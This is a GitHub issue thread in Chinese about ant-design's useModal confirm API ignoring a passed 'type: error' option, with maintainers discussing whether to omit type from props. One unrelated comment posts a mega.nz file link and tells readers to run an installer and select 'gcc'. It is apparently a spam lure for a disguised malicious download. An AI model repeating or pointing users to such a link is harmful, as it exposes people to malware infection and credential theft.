### ISSUE TITLE
useModal 返回的HookApi.confirm 渲染类型不符合预期

### ISSUE THREAD

**Issue by CCherry07** [ant-design/ant-design#50567]
### Reproduction link

[![Edit on StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/edit/react-fsrpmu?file=demo.tsx)

### Steps to reproduce

点击Confirm按钮

### What is expected?

渲染的应该是error类型的modal

### What is actually happening?

渲染的是Confirm类型的modal

| Environment | Info |
| --- | --- |
| antd | 5.20.2 |
| React | latest |
| System | mac |
| Browser | Chrome |

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by zombieJ** [comment]
> 点击Confirm按钮
> 预期：渲染的应该是error类型的modal
> 实际：渲染的是Confirm类型的modal

没看懂，点击 Confirm 按钮渲染 Confirm 类型的 Modal 不是预期的么？为什么点击 Confirm 按钮需要渲染 Error 类型的 Modal？

**Comment by CCherry07** [comment]
> > 点击Confirm按钮
> > 预期：渲染的应该是error类型的modal
> > 实际：渲染的是Confirm类型的modal
> 
> 没看懂，点击 Confirm 按钮渲染 Confirm 类型的 Modal 不是预期的么？为什么点击 Confirm 按钮需要渲染 Error 类型的 Modal？

是因为我想封装一哈，看见了type能传，我就想，不在需要modal.[type]()去使用了，直接在配置里面配置调用即可

**Comment by li-jia-nan** [comment]
@zombieJ 是不是应该把外部传入的 type 从 props 里面 Omit 掉？

**Comment by CCherry07** [comment]
> @zombieJ 是不是应该把外部传入的 type 从 props 里面 Omit 掉？

其实用的同一个组件，仅type不同，感觉是可以我这样做的

**Comment by CCherry07** [comment]
@zombieJ 我ConfirmModal,下 update({ type:"error" }) 就变成了 error类型的modal 这个也是符合预期的吗？
